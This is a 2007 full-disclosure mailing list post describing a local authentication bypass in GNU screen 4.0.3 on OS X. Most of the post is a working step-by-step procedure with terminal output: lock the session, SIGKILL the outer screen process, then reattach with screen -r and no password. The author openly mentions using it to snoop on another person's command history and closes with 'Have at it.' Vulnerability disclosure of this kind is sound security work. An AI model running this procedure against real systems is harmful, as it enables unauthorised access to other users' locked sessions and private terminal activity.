Date: Wed, 6 Jun 2007 20:33:08 +0930
From: Sûnnet Beskerming <info@...kerming.com>
To: full-disclosure@...ts.grok.org.uk
Cc: Lolek of TK53 <lolek1337@...glemail.com>
Subject: screen 4.0.3 local Authentication Bypass - Working on multiple systems

After fiddling around with different signal codes and looking at the
process shown by Paul, it looks like we can replicate this bypass on
other systems now.  Tested and working on OS X 10.4.9 (screen
4.00.03).  By following the slightly modified procedure, it should be
repeatable across all systems.

~user(bash) $ screen
[system spawns two new pids, both for screen, and then a third pid for
bash]
Activity Monitor now shows (in hierarchy mode)
pid 4965 Terminal
   \ pid 5111 login
     \ pid 5112 bash
       \ pid 5171 screen
         \ pid 5172 screen
           \ pid 5174 bash

~user(screen) $ echo Once the process is killed, I should not reappear.
Once the process is killed, I should not reappear.
~user(screen) $ ^a+x
Key: [1234]
Again: [1234]
Screen used by User <user>.
Password:

At this stage we now need to kill the right process.  On OS X, screen
ignores the SIGINT sent by ^c, so we need to send it a SIGKILL.
Using your favourite process killer, kill the outer screen pid
(5171).  If you vary the process, such as:
	SIGKILL pid 5174 or 5172 - it will appear to not do anything, but
when the password is re-entered it will return an error that it can't
connect to session 5172.ttyp1.user and will terminate 5172 at this
time.  Occasionally, it will not kill the parent process, or will
refuse the legitimate password, but normally it will terminate.
Running screen -r will identify one or more screens that could be
dead, but not able to be accessed (then run screen -wipe to remove them
completely).

Password:Killed
~user(bash) $ screen -r
[automatically loads the following]

~user(screen) $ echo Once the process is killed, I should not reappear.
Once the process is killed, I should not reappear.
~user(screen) $

The system has spawned a completely new pid for screen, and has only
loaded a single instance of it.  If the user now locks the screen it
will ask for the password all over again - it has forgotten the
original setting.  If you are going to use it to poke around
someone's command history or screen use, then be aware of this result
(then again, if you knew the password in the beginning, why bother
with this process).

Have at it.

Carl

Sûnnet Beskerming Pty. Ltd.
Adelaide, Australia
http://www.beskerming.com
